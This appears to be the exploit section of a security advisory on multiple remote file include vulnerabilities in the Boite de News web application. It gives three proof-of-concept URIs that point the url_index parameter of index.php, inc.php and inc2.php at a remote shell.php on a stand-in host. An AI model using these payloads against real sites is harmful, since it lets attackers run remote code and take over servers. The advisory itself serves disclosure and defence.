Boite de News Multiple Remote File Include Vulnerabilities

info
discussion
exploit
solution
references

Boite de News Multiple Remote File Include Vulnerabilities

Attackers can exploit these issues using a web client.

The following proof-of-concept URIs are available:

http://www.example.com/[Path]/index.php?url_index=http://www.example2.com/shell.php?

http://www.example.com/[Path]/inc.php?url_index=http://www.example2.com/shell.php?

http://www.example.com/[Path]/inc2.php?url_index=http://www.example2.com/shell.php?

/data/vulnerabilities/exploits/boitedenews-v4.0.1-rfi.txt